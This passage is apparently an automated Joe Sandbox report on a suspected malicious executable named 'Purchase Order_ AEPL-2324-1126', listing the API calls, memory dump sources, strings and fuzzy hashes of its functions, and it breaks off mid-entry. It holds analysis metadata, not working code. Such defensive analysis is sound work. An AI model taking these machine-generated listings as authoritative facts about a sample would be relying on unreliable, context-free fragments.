                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: EnvironmentStrings$Free__malloc_crt
                                  • String ID:
                                  • API String ID: 237123855-0
                                  • Opcode ID: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
                                  • Instruction ID: d6a98a4ee5591e13f27bf8bfb2f7094eea62761642478a01f8f101a8eeefaa10
                                  • Opcode Fuzzy Hash: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
                                  • Instruction Fuzzy Hash: D1F08277505220BB8A25BF35BC458DB277ADAD536531A443BF407C3206F66C8ECB82B9
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: DeleteObject$74285CursorDestroy
                                  • String ID:
                                  • API String ID: 3764361659-0
                                  • Opcode ID: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                                  • Instruction ID: b40ecd1d224a0eee13877c21127d2214a34fa415f2bf64fab3c1d23e87691ec4
                                  • Opcode Fuzzy Hash: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                                  • Instruction Fuzzy Hash: 60F03C74200601DBC720EF66EDD892B77ACEF49762B00452AFD01D7256D738DC49CB69
                                  APIs
                                  • RtlEnterCriticalSection.KERNEL32(?), ref: 0044B5F5
                                  • InterlockedExchange.KERNEL32(?,?), ref: 0044B603
                                  • RtlLeaveCriticalSection.KERNEL32(?), ref: 0044B61A
                                  • RtlLeaveCriticalSection.KERNEL32(?), ref: 0044B62C
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                                  • String ID:
                                  • API String ID: 2223660684-0
                                  • Opcode ID: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                                  • Instruction ID: 403f3527bf09fa8cde02bf077099102ce48e3ba47acdf7e4c6f4aa39df9fcef1
                                  • Opcode Fuzzy Hash: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                                  • Instruction Fuzzy Hash: 78F05E36241104AF96145F59FD488EBB3ACEBE96317005A3FE5418361087A6E845CBB5
                                  APIs
                                    • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                    • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                    • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                    • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                    • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                  • MoveToEx.GDI32(?,?,?,00000000), ref: 00447317
                                  • LineTo.GDI32(?,?,?), ref: 00447326
                                  • EndPath.GDI32(?), ref: 00447336
                                  • StrokePath.GDI32(?), ref: 00447344
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: ObjectPath$Select$BeginCreateDeleteLineMoveStroke
                                  • String ID:
                                  • API String ID: 2783949968-0
                                  • Opcode ID: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                                  • Instruction ID: af9b10de2b5e1f20f757a647655db97b0f5a8bbb123370319d9b3a4020b10ea9
                                  • Opcode Fuzzy Hash: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                                  • Instruction Fuzzy Hash: EBF06770105258BBE721AF54ED4EFAF3B9CAB06310F108119FE01622D1C7B86A02CBA9
                                  APIs
                                  • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                                  • GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                                  • GetCurrentThreadId.KERNEL32 ref: 004364A3
                                  • AttachThreadInput.USER32(00000000), ref: 004364AA
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                  • String ID:
                                  • API String ID: 2710830443-0
                                  • Opcode ID: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                                  • Instruction ID: 8dfc3faa83ebd232c18032ab1719f084f6ac8c8028b438e2b3a9de4cfe148046
                                  • Opcode Fuzzy Hash: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                                  • Instruction Fuzzy Hash: 61F06D7168470477EB209BA09D0EFDF379CAB18B11F10C41ABB04BA0C0C6F8B50087AD
                                  APIs
                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00436C38
                                  • 74FD5030.USERENV(?,?,?,000000FF), ref: 00436C46
                                  • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C56
                                  • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C5B
                                    • Part of subcall function 00436BA9: GetProcessHeap.KERNEL32(00000000,?), ref: 00436BB6
                                    • Part of subcall function 00436BA9: HeapFree.KERNEL32(00000000), ref: 00436BBD
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: CloseHandleHeap$D5030FreeObjectProcessSingleWait
                                  • String ID:
                                  • API String ID: 1757875481-0
                                  • Opcode ID: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                                  • Instruction ID: 8fc8aea04bb3fa9100768a89291620bc24087d812574934f99790ad9b639e1d9
                                  • Opcode Fuzzy Hash: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                                  • Instruction Fuzzy Hash: D9E0C97A510215ABC720EBA6DC48C5BB7ACEF99330311892EFD9683750DA74F840CFA4
                                  APIs
                                  • GetDesktopWindow.USER32 ref: 00472B63
                                  • 7427A570.USER32(00000000), ref: 00472B6C
                                  • 74284620.GDI32(00000000,0000000C), ref: 00472B78
                                  • 7427A480.USER32(00000000,?), ref: 00472B99
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: 7427$74284620A480A570DesktopWindow
                                  • String ID:
                                  • API String ID: 2484511535-0
                                  • Opcode ID: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                                  • Instruction ID: 759e45c534ddacfdadb557a06d932f9b55f62470d77a370046d272fbe6975a9a
                                  • Opcode Fuzzy Hash: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                                  • Instruction Fuzzy Hash: BFF03071900205AFDB00EFB5DA4DA5DB7F4FB44315B10887EFD05D7251EAB59900DB54
                                  APIs
                                  • GetDesktopWindow.USER32 ref: 00472BB2
                                  • 7427A570.USER32(00000000), ref: 00472BBB
                                  • 74284620.GDI32(00000000,00000074), ref: 00472BC7
                                  • 7427A480.USER32(00000000,?), ref: 00472BE8
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: 7427$74284620A480A570DesktopWindow
                                  • String ID:
                                  • API String ID: 2484511535-0
                                  • Opcode ID: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                                  • Instruction ID: 439663e17c05eb9dd95bc161916493026628bcc8c78d0f5787bb5213a8e6c1b3
                                  • Opcode Fuzzy Hash: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                                  • Instruction Fuzzy Hash: FAF03075900205AFCB00EFB5DA8856DB7F4FB84315B10887EFD05D7250DB7999019B94
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: _strncmp
                                  • String ID: Q\E
                                  • API String ID: 909875538-2189900498
                                  • Opcode ID: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                                  • Instruction ID: ec78d02982e52cebfc3c5ce94050df53d12509a5c8006a296af1ac46f88178f7
                                  • Opcode Fuzzy Hash: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                                  • Instruction Fuzzy Hash: 34C1A070A04279ABDF318E58A4507ABBBB5AF59310FE441BFD8D493341D2784D8ACB89
                                  APIs
                                  • OleSetContainedObject.OLE32(00000000,00000001), ref: 00460F3E
                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                    • Part of subcall function 00445660: OleSetContainedObject.OLE32(?,00000000), ref: 004456DD
                                    • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                    • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                    • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
                                    • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
                                    • Part of subcall function 00451B42: VariantClear.OLEAUT32(-00000058), ref: 00451CA1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Variant$Copy$ContainedObject$ClearErrorLast_malloc
                                  • String ID: AutoIt3GUI$Container
                                  • API String ID: 2652923123-3941886329
                                  • Opcode ID: 662e4c56437cfc6d97a34dfd7b47562ea5a254ee8eeedf1ae9933f7f1d1523bc
                                  • Instruction ID: 68a0a4eee7c61d0b7a6187be62517e39d581686f9474de6139c94a20f06104f0
                                  • Opcode Fuzzy Hash: 662e4c56437cfc6d97a34dfd7b47562ea5a254ee8eeedf1ae9933f7f1d1523bc
                                  • Instruction Fuzzy Hash: 68A15D746006059FDB10DF69C881B6BB7E4FF88704F24896AEA09CB351EB75E841CB65
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: _memmove_strncmp
                                  • String ID: U$\
                                  • API String ID: 2666721431-100911408
                                  • Opcode ID: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
                                  • Instruction ID: d3eef72359a6f1828d14317ef8b56b8bfbdd52bf5bc7584d89ae5f72f5b530e1
                                  • Opcode Fuzzy Hash: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
                                  • Instruction Fuzzy Hash: 13718F70E00245CFEF24CFA9C9906AEFBF2AF99304F24826ED445A7345D778A946CB15
                                  APIs
                                    • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                    • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                  • __wcsnicmp.LIBCMT ref: 00467288
                                  • WNetUseConnectionW.MPR(00000000,?,00000000,?,00000000,?,00000000,?), ref: 0046732E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Connection__wcsnicmp_wcscpy_wcslen
                                  • String ID: LPT
                                  • API String ID: 3035604524-1350329615
                                  • Opcode ID: df00d6e4b866e053a8717e7cd00b83b505630e9b2d4c108cf88e8e3b58e1c49d
                                  • Instruction ID: cd88b7ab87c5f5a0ce5478f82160e7cdfa8c7cefd9f65e810a8a3337a25aa570
                                  • Opcode Fuzzy Hash: df00d6e4b866e053a8717e7cd00b83b505630e9b2d4c108cf88e8e3b58e1c49d
                                  • Instruction Fuzzy Hash: FB51E675A04204ABDB10DF54CC81FAFB7B5AB84708F10855EF905AB381E778EE85CB99
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: _memmove
                                  • String ID: \$h
                                  • API String ID: 4104443479-677774858
                                  • Opcode ID: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
                                  • Instruction ID: de34c7bb2fe7d28e42aef252d9636822906cf09101983ade98a7172327fa6e04
                                  • Opcode Fuzzy Hash: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
                                  • Instruction Fuzzy Hash: F551A370E002098FDF18CFA9C980AAEB7F2BFC9304F28826AD405AB345D7389D45CB55
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: _memcmp
                                  • String ID: &
                                  • API String ID: 2931989736-1010288
                                  • Opcode ID: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
                                  • Instruction ID: 5cd53615f07abd051f481cac668b43ae4088e938354b3ed51608dfeeaf990cc9
                                  • Opcode Fuzzy Hash: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
                                  • Instruction Fuzzy Hash: EC517BB1A0011A9FDB18CF95D891ABFB7B5FF88300F14915AE815A7344D278AE42CBA4
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: _memmove
                                  • String ID: \
                                  • API String ID: 4104443479-2967466578
                                  • Opcode ID: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
                                  • Instruction ID: e0e732097d18f8f10327b86eac3a97b4532b2e4be511d275227a7a0ca48fbcca
                                  • Opcode Fuzzy Hash: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
                                  • Instruction Fuzzy Hash: 2451C570E002498FEF24CFA9C8902AEFBB2BF95314F28826BD45597385D7395D86CB45
                                  APIs
                                  • _wcslen.LIBCMT ref: 00466825
                                  • InternetCrackUrlW.WININET(?,00000000,?), ref: 0046682F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: CrackInternet_wcslen
                                  • String ID: |
                                  • API String ID: 596671847-2343686810
                                  • Opcode ID: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
                                  • Instruction ID: c4ea99685e293915e64884ba1c360efc28696701351dc191072b09a6dd262d67
                                  • Opcode Fuzzy Hash: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
                                  • Instruction Fuzzy Hash: B1415076E10209ABDB00EFA5D881BEEB7B8FF58314F00002AE604A7291D7757916CBE5
                                  APIs
                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00448446
                                  • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0044845F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: MessageSend
                                  • String ID: '
                                  • API String ID: 3850602802-1997036262
                                  • Opcode ID: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                                  • Instruction ID: ddf1801fc3b7a37e921bcadc6f33ff454999d78e89978ed9e0859c1643e2593c
